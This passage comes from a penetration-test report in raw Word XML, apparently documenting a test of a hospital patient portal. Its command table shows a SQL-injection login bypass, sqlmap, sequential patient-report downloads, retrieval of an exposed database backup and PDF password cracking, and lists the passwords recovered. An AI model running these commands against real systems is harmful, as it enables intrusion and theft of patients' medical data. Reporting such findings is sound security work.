              <w:t>curl -k -sS -o /tmp/b.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin' -- -" --data-urlencode "password=wrongpassword123"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 302; redirect to /patient/portal.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Automated SQLi validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlmap -u "https://medirozahospital.com/patient/login.php" --data="username=admin&amp;password=wrongpassword123" -p username --batch --level=1 --risk=1 --threads=1 --timeout=15 --retries=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>403 responses/connection failures; injection not independently confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient report retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GET /patient/download.php?id=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 200; 3,657 bytes; application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient report retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GET /patient/download.php?id=2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 200; 3,611 bytes; application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient report retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GET /patient/download.php?id=3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 200; 3,735 bytes; application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public backup retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -k -sS -O "https://medirozahospital.com/old/mediroza_db_backup_2019.sql"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.2 KB; 93 lines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Backup inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ls -lah mediroza_db_backup_2019.sql &amp;&amp; wc -l mediroza_db_backup_2019.sql &amp;&amp; head -20 mediroza_db_backup_2019.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Backup header identifies confidential HR/shareholder data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF hash extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/usr/share/john/pdf2john.pl patient_report_1.pdf &gt; patient_report_1.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF hash extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF hash extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/usr/share/john/pdf2john.pl patient_report_2.pdf &gt; patient_report_2.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF hash extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF hash extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/usr/share/john/pdf2john.pl patient_report_3.pdf &gt; patient_report_3.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF hash extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>John the Ripper attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>john --format=pdf --wordlist=/usr/share/wordlists/rockyou.txt patient_report_1.hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Installed build rejected the supplied PDF hash format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF security inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>qpdf --show-encryption patient_report_1.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V=2; R=3; 128-bit; encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF integrity validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>qpdf --check patient_report_1.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No structural errors after decryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF password recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pdfcrack -w /usr/share/wordlists/rockyou.txt patient_report_1.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Password recovered: 123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF password recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pdfcrack -w /usr/share/wordlists/rockyou.txt patient_report_2.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Password recovered: password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF password recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pdfcrack -w /usr/share/wordlists/rockyou.txt patient_report_3.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Password recovered: !@#$%^&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Representative HTTP proof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /patient/login.php HTTP/2</w:t>
        <w:br/>
        <w:t>Host: medirozahospital.com</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:br/>
        <w:t>username=admin%27+--+-&amp;password=wrongpassword123</w:t>
        <w:br/>
        <w:br/>
        <w:t>HTTP/2 302</w:t>
        <w:br/>
        <w:t>Location: https://medirozahospital.com/patient/portal.php</w:t>
        <w:br/>
        <w:t>Set-Cookie: PHPSESSID=&lt;redacted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>30. Evidence Integrity &amp; Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The evidence package was organized into numbered domains covering source material, reconnaissance, network scans, web access, SQL injection/Burp evidence, patient reports, password recovery, database exposure, reports and manifests. The original package contained 65 files representing 58 unique SHA-256 content hashes with duplicate-content groups identified in the inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence integrity is important in a penetration test because a finding should remain independently checkable after the live target changes. The captured PDFs, SQL backup, screenshots, command register and SHA-256 inventory therefore form the durable proof layer for the report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>31. Confidential Credential &amp; Sensitive Data Appendix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RESTRICTED. The following values are included only for the authorized technical record. They must not be placed in a public repository or public portfolio.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovered password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patient_report_1.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
